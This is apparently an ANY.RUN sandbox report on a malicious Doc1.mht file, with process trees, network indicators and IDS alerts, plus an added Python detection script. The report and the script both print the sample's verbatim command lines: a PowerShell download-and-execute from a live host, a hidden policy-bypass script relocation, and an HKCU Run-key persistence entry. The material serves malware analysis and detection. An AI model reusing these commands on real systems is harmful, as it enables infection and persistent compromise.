File name: Doc1.mht
Full analysis: https://app.any.run/tasks/35d05df3-fe9f-48d9-8fca-7051e3933938
Verdict: Malicious activity
Analysis date: June 18, 2019, 18:19:44
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
MIME: text/plain
File info: MIME entity, ISO-8859 text, with CRLF line terminators
MD5: C4C2FDCFA0B3414D88EBCF4505D9B409
SHA1: 6ECB340C4A35001AE3C2BD2D35DAA24A13E55ABB
SHA256: CCA2CFA18C0AFD98360263BD06BE5CBF9CB80AEDBC1B7786692D058881E7CE3A
SSDEEP: 6144:DJ1LHeGrJs7pH1np6+9F+x2UyvP5wwzWZpz:DvXruV1pX+4US5w2m

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Executes PowerShell scripts
      • cmd.exe (PID: 3836)
    • Changes the autorun value in the registry
      • powershell.exe (PID: 2260)
    • Loads the Task Scheduler COM API
      • mmc.exe (PID: 1940)
    • Writes to a start menu file
      • powershell.exe (PID: 2448)
  • SUSPICIOUS
    • Starts CMD.EXE for commands execution
      • mshta.exe (PID: 4036)
    • Creates files in the user directory
      • powershell.exe (PID: 2708)
      • powershell.exe (PID: 3756)
      • powershell.exe (PID: 2260)
      • powershell.exe (PID: 2448)
      • powershell.exe (PID: 2096)
    • Executed via COM
      • mshta.exe (PID: 4036)
    • Executes scripts
      • powershell.exe (PID: 2708)
      • powershell.exe (PID: 3756)
    • Executes PowerShell scripts
      • wscript.exe (PID: 2640)
      • WScript.exe (PID: 4060)
  • INFO
    • Reads Microsoft Office registry keys
      • iexplore.exe (PID: 3072)
    • Reads Internet Cache Settings
      • iexplore.exe (PID: 3488)
      • iexplore.exe (PID: 3072)
      • iexplore.exe (PID: 3484)
    • Reads internet explorer settings
      • iexplore.exe (PID: 3488)
      • iexplore.exe (PID: 3484)
      • mshta.exe (PID: 4036)
    • Changes internet zones settings
      • iexplore.exe (PID: 3072)
    • Creates files in the user directory
      • iexplore.exe (PID: 3484)
    • Reads settings of System Certificates
      • iexplore.exe (PID: 3072)
      • powershell.exe (PID: 2708)
    • Application launched itself
      • iexplore.exe (PID: 3072)
    • Changes settings of System certificates
      • iexplore.exe (PID: 3072)
    • Adds / modifies Windows certificates
      • iexplore.exe (PID: 3072)
    • Manual execution by user
      • calc.exe (PID: 2380)
      • mmc.exe (PID: 3552)
      • mmc.exe (PID: 1940)
No Malware configuration.

TRiD

.mht/mhtml | MIME HTML archive format (var 2) (100)
Total processes: 58
Monitored processes: 15
Malicious processes: 6
Suspicious processes: 2

Behavior graph

Monitored processes in start order ("no specs" marks a process with no notable indicators of its own):
iexplore.exe, iexplore.exe (no specs), iexplore.exe, mshta.exe, cmd.exe (no specs), powershell.exe, wscript.exe (no specs), powershell.exe (no specs), wscript.exe (no specs), powershell.exe, powershell.exe, powershell.exe, calc.exe (no specs), mmc.exe (no specs), mmc.exe

Process information

PID 3072  "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\admin\Desktop\Doc1.mht
  Path: C:\Program Files\Internet Explorer\iexplore.exe
  Parent process: explorer.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Internet Explorer
  Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID 3488  "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3072 CREDAT:79873
  Path: C:\Program Files\Internet Explorer\iexplore.exe
  Parent process: iexplore.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Internet Explorer
  Exit code: 0
  Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID 3484  "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3072 CREDAT:203009
  Path: C:\Program Files\Internet Explorer\iexplore.exe
  Parent process: iexplore.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: LOW
  Description: Internet Explorer
  Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID 4036  C:\Windows\System32\mshta.exe -Embedding
  Path: C:\Windows\System32\mshta.exe
  Parent process: svchost.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Microsoft (R) HTML Application host
  Exit code: 0
  Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID 3836  "C:\Windows\System32\cmd.exe" /c powershell (new-object System.Net.WebClienT).DownloadFile('https://briargrove.org/wp-includes/microsoft.js','%temp%\microsoft.js'); Start '%temp%\microsoft.js'
  Path: C:\Windows\System32\cmd.exe
  Parent process: mshta.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Windows Command Processor
  Exit code: 0
  Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 2708  powershell (new-object System.Net.WebClienT).DownloadFile('https://briargrove.org/wp-includes/microsoft.js','C:\Users\admin\AppData\Local\Temp\microsoft.js'); Start 'C:\Users\admin\AppData\Local\Temp\microsoft.js'
  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Parent process: cmd.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Windows PowerShell
  Exit code: 0
  Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 4060  "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\microsoft.js"
  Path: C:\Windows\System32\WScript.exe
  Parent process: powershell.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Microsoft ® Windows Based Script Host
  Exit code: 0
  Version: 5.8.7600.16385

PID 3756  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.js',[System.IO.File]::ReadAllText('C:\Users\admin\AppData\Local\Temp\microsoft.js'));wscript 'C:\Users\admin\AppData\Roaming\microsoft.js'"
  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Parent process: WScript.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Windows PowerShell
  Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 2640  "C:\Windows\system32\wscript.exe" C:\Users\admin\AppData\Roaming\microsoft.js
  Path: C:\Windows\system32\wscript.exe
  Parent process: powershell.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Microsoft ® Windows Based Script Host
  Exit code: 0
  Version: 5.8.7600.16385

PID 2260  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\admin\AppData\Roaming\microsoft.js' -PropertyType String -Force;"
  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Parent process: wscript.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Windows PowerShell
  Version: 6.1.7600.16385 (win7_rtm.090713-1255)
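The process table above is the detection-relevant part of this report: a COM-activated mshta.exe (parent svchost.exe, -Embedding) spawns cmd.exe, which runs a PowerShell WebClient.DownloadFile into %TEMP% followed by Start, the downloaded .js is run by WScript.exe, which launches a hidden, ExecutionPolicy-Bypass PowerShell that copies the script to AppData\Roaming and re-runs it, and the second script-host instance finally spawns a PowerShell that writes an HKCU Run value pointing at the .js file. The Python below is an added example (not ANY.RUN's code or anything recovered from the sample) that encodes those parent/child and command-line observations as rules over process-creation events. The event records are constructed from the table (PIDs, image names and command lines verbatim); the ProcEvent schema is an assumption loosely modelled on Sysmon Event ID 1, and the parent PIDs are inferred from the table's parent names, since the report lists only names.

```python
"""Detection over process-creation events for the chain shown in this report:
mshta.exe (COM-activated) -> cmd.exe -> powershell.exe (download + Start) ->
WScript.exe -> powershell.exe (copy to Roaming) -> wscript.exe -> powershell.exe
(HKCU Run key). Added example, not ANY.RUN's code or the sample's. The events are
constructed from the "Process information" table (PIDs, images and command lines
verbatim); the ProcEvent schema is an assumption loosely modelled on Sysmon
Event ID 1, and the parent PIDs are inferred from the table's parent names.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str                 # file name of the started process, as logged
    parent_pid: Optional[int]  # None when the parent is not in the table
    parent_image: str
    cmdline: str


EVENTS: List[ProcEvent] = [  # constructed from the report; parent PIDs inferred
    ProcEvent(3072, "iexplore.exe", None, "explorer.exe",
              r'''"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\admin\Desktop\Doc1.mht'''),
    ProcEvent(4036, "mshta.exe", None, "svchost.exe", r"C:\Windows\System32\mshta.exe -Embedding"),
    ProcEvent(3836, "cmd.exe", 4036, "mshta.exe",
              r""""C:\Windows\System32\cmd.exe" /c powershell (new-object System.Net.WebClienT).DownloadFile('https://briargrove.org/wp-includes/microsoft.js','%temp%\microsoft.js'); Start '%temp%\microsoft.js'"""),
    ProcEvent(2708, "powershell.exe", 3836, "cmd.exe",
              r"""powershell (new-object System.Net.WebClienT).DownloadFile('https://briargrove.org/wp-includes/microsoft.js','C:\Users\admin\AppData\Local\Temp\microsoft.js'); Start 'C:\Users\admin\AppData\Local\Temp\microsoft.js'"""),
    ProcEvent(4060, "WScript.exe", 2708, "powershell.exe",
              r'''"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\microsoft.js"'''),
    ProcEvent(3756, "powershell.exe", 4060, "WScript.exe",
              r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.js',[System.IO.File]::ReadAllText('C:\Users\admin\AppData\Local\Temp\microsoft.js'));wscript 'C:\Users\admin\AppData\Roaming\microsoft.js'"'''),
    ProcEvent(2640, "wscript.exe", 3756, "powershell.exe",
              r'''"C:\Windows\system32\wscript.exe" C:\Users\admin\AppData\Roaming\microsoft.js'''),
    ProcEvent(2260, "powershell.exe", 2640, "wscript.exe",
              r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\admin\AppData\Roaming\microsoft.js' -PropertyType String -Force;"'''),
]

SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
SCRIPT_EXT = (".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta")
RUN_KEY = re.compile(r"hkcu:\\software\\microsoft\\windows\\currentversion\\run\b")


def rules(img: str, par: str, cmd: str) -> List[str]:
    """Run every rule against one lower-cased event; return the names that fire."""
    fired = []
    if img == "mshta.exe" and par == "svchost.exe" and "-embedding" in cmd:
        fired.append("mshta_com_activation")  # HTA host started via COM, not by a user
    if par == "mshta.exe" and img in SHELLS:
        fired.append("mshta_spawns_shell")
    if (img in {"cmd.exe", "powershell.exe"} and "downloadfile(" in cmd and re.search(r"\bstart\b", cmd)
            and ("%temp%" in cmd or "\\appdata\\local\\temp\\" in cmd)):
        fired.append("download_then_start")  # WebClient.DownloadFile into %TEMP%, then Start
    if par in {"wscript.exe", "cscript.exe"} and img == "powershell.exe":
        fired.append("script_host_spawns_powershell")
    if img == "powershell.exe" and "-executionpolicy bypass" in cmd and "-windowstyle hidden" in cmd:
        fired.append("hidden_bypass")
    if (img == "powershell.exe" and "writealltext(" in cmd and "readalltext(" in cmd
            and any(ext + "'" in cmd for ext in SCRIPT_EXT)):
        fired.append("script_copied")  # relocates a script file with File.ReadAllText/WriteAllText
    if img == "powershell.exe" and "new-itemproperty" in cmd and RUN_KEY.search(cmd):
        value = re.search(r"-value\s+'([^']+)'", cmd)
        if value and value.group(1).endswith(SCRIPT_EXT):
            fired.append("run_key_script_persistence")  # HKCU Run value is a script-host file
    return fired


def evaluate(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Map each PID to the rules that fired on it; PIDs with no hits are omitted."""
    hits: Dict[int, List[str]] = {}
    for ev in events:
        fired = rules(ev.image.lower(), ev.parent_image.lower(), ev.cmdline.lower())
        if fired:
            hits[ev.pid] = fired
    return hits


def ancestry(events: List[ProcEvent], pid: int) -> List[str]:
    """Follow parent_pid links from pid back to the oldest logged ancestor, oldest first."""
    by_pid = {ev.pid: ev for ev in events}
    chain, seen = [], set()
    ev = by_pid.get(pid)
    while ev is not None and ev.pid not in seen:
        seen.add(ev.pid)
        chain.append(f"{ev.image}({ev.pid})")
        ev = by_pid.get(ev.parent_pid) if ev.parent_pid is not None else None
    return chain[::-1]


if __name__ == "__main__":
    for pid, fired in evaluate(EVENTS).items():
        print(pid, " -> ".join(ancestry(EVENTS, pid)), fired)
```

The rules key on parent/child relationships and command-line substrings rather than on file hashes: the report gives no hash for microsoft.js, and a dropper like this changes its payload per campaign while the mshta -> cmd -> powershell -> wscript -> powershell shape stays the same. All matching is done on lower-cased strings because the sample itself mixes case (WebClienT, WScript.exe beside wscript.exe), which defeats naive case-sensitive signatures.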
Total events: 2 133
Read events: 1 711
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 0
Suspicious files: 11
Text files: 19
Unknown types: 6

Dropped files

PID 3072  iexplore.exe
  File: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\favicon[1].ico
  MD5 / SHA256: not listed

PID 3072  iexplore.exe
  File: C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
  MD5 / SHA256: not listed

PID 3484  iexplore.exe
  File: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\F44N9BJ2\Review[1].php
  MD5 / SHA256: not listed

PID 3072  iexplore.exe
  File: C:\Users\admin\AppData\Local\Temp\~DFCBA326C545C1B121.TMP
  MD5 / SHA256: not listed

PID 3488  iexplore.exe
  File: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\wbkF07A.tmp  (type: html)
  MD5: 090232B3C8F92ACEB847204FCE291D4A
  SHA256: 173492875620017611F1E174F6467DCF066172E7D4F7659C4F2085E943A3D25B

PID 3488  iexplore.exe
  File: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\wbkF2F2.tmp  (type: image)
  MD5: 35724C96044F72731721C2B2C13F60BA
  SHA256: 025A51F120D4CB2DE056865637E3B83BA544CCA58CB05D2D258E01C1D268858E

PID 3488  iexplore.exe
  File: C:\Users\admin\AppData\Local\Temp\VGXF0DB.tmp  (type: image)
  MD5: 35724C96044F72731721C2B2C13F60BA
  SHA256: 025A51F120D4CB2DE056865637E3B83BA544CCA58CB05D2D258E01C1D268858E

PID 3488  iexplore.exe
  File: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\wbkF0DA.tmp  (type: image)
  MD5: 35724C96044F72731721C2B2C13F60BA
  SHA256: 025A51F120D4CB2DE056865637E3B83BA544CCA58CB05D2D258E01C1D268858E

PID 3488  iexplore.exe
  File: C:\Users\admin\AppData\Local\Temp\VGXF2F3.tmp  (type: image)
  MD5: 35724C96044F72731721C2B2C13F60BA
  SHA256: 025A51F120D4CB2DE056865637E3B83BA544CCA58CB05D2D258E01C1D268858E

PID 3488  iexplore.exe
  File: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\wbkF2B1.tmp  (type: html)
  MD5: 090232B3C8F92ACEB847204FCE291D4A
  SHA256: 173492875620017611F1E174F6467DCF066172E7D4F7659C4F2085E943A3D25B
HTTP(S) requests: 5
TCP/UDP connections: 13
DNS requests: 5
Threats: 0

HTTP requests

PID   Process       Method  HTTP code  IP                 URL                                                      CN       Type   Size   Reputation
3484  iexplore.exe  GET                193.56.28.128:80   http://docandpdfonline.servepics.com/microsoft.hta       unknown                malicious
4036  mshta.exe     GET                193.56.28.128:80   http://docandpdfonline.servepics.com/microsoft.hta       unknown                malicious
3072  iexplore.exe  GET     404        193.56.28.128:80   http://docandpdfonline.servepics.com/images/favicon.ico  unknown  html   311 b  malicious
3484  iexplore.exe  GET     200        193.56.28.128:80   http://docandpdfonline.servepics.com/Review.php          unknown  html   293 b  malicious
3072  iexplore.exe  GET     200        204.79.197.200:80  http://www.bing.com/favicon.ico                          US       image  237 b  whitelisted

Connections

PID              Process         IP                  Domain                         ASN                    CN  Reputation
3072             iexplore.exe    204.79.197.200:80   www.bing.com                   Microsoft Corporation  US  whitelisted
2708             powershell.exe  166.62.121.61:443   briargrove.org                 GoDaddy.com, LLC       US  suspicious
3072             iexplore.exe    193.56.28.128:80    docandpdfonline.servepics.com                             malicious
4036             mshta.exe       193.56.28.128:80    docandpdfonline.servepics.com                             malicious
2096             powershell.exe  194.5.98.253:5478                                                         FR  malicious
3484             iexplore.exe    193.56.28.128:80    docandpdfonline.servepics.com                             malicious
(PID not shown)                  193.56.28.134:5478                                                            malicious
2096             powershell.exe  193.56.28.134:5478                                                            malicious

DNS requests

Domain                         IP                             Reputation
www.bing.com                   204.79.197.200, 13.107.21.200  whitelisted
docandpdfonline.servepics.com  193.56.28.128                  malicious
briargrove.org                 166.62.121.61                  suspicious
dns.msftncsi.com               131.107.255.255                shared

Threats

PID   Process       Class                          Message
3484  iexplore.exe  Potentially Bad Traffic        ET POLICY Possible HTA Application Download
3484  iexplore.exe  Attempted User Privilege Gain  ET WEB_CLIENT GENERIC VB ShellExecute Function Inside of VBSCRIPT tag
4036  mshta.exe     Potentially Bad Traffic        ET POLICY Possible HTA Application Download
4036  mshta.exe     Attempted User Privilege Gain  ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl
4036  mshta.exe     A Network Trojan was detected  ET CURRENT_EVENTS SUSPICIOUS MSXMLHTTP DL of HTA (Observed in CVE-2017-0199)
4036  mshta.exe     Attempted User Privilege Gain  ET WEB_CLIENT GENERIC VB ShellExecute Function Inside of VBSCRIPT tag
Debug output strings

Process  Message
mmc.exe  Constructor: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
mmc.exe  OnInitialize: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
mmc.exe  AddIcons: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
mmc.exe  ProcessCommandLineArguments: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn